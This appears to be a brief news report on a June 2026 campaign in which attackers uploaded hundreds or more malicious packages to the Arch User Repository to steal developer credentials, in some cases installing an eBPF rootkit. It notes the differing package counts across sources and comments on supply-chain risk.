Unidentified attackers uploaded a large number of malicious packages to the Arch Linux Arch User Repository earlier this month [1], [2], [3].

This breach targets a critical community-driven distribution hub, potentially exposing thousands of developers and users to system-level compromises. Because the AUR relies on user-submitted scripts, it represents a significant supply-chain vulnerability that can be exploited to bypass traditional security perimeters.

The attack focused on the Arch User Repository, an online package hosting platform [1], [4]. According to some reports, the attackers uploaded 1,500 malicious packages [1], [2]. Other reports estimate the number of compromised packages to be over 1,500 [3].

However, other security sources provide lower estimates. Some reports said that more than 400 packages were affected [5], while others cite a figure of 400-plus [6]. A separate report from WebProNews listed the number at 400 [7].

The primary objective of the campaign was to steal credentials from developers [5], [6]. In certain instances, the attackers used the compromise to deploy an eBPF rootkit on the infected systems [5], [6].

An eBPF rootkit is particularly dangerous because it operates within the kernel, allowing attackers to hide processes and maintain persistence without being detected by standard security tools. The attack was first reported between June 11 and June 13, 2026 [2], [5].

Attackers uploaded a large number of malicious packages to the Arch Linux Arch User Repository

This incident highlights the inherent security risks of community-maintained repositories where the barrier to entry for uploading code is low. The use of an eBPF rootkit demonstrates a high level of technical sophistication, as these tools allow attackers to manipulate the operating system kernel to evade detection. For the broader Linux ecosystem, this underscores the necessity of verifying package integrity and the dangers of trusting third-party repositories without rigorous auditing.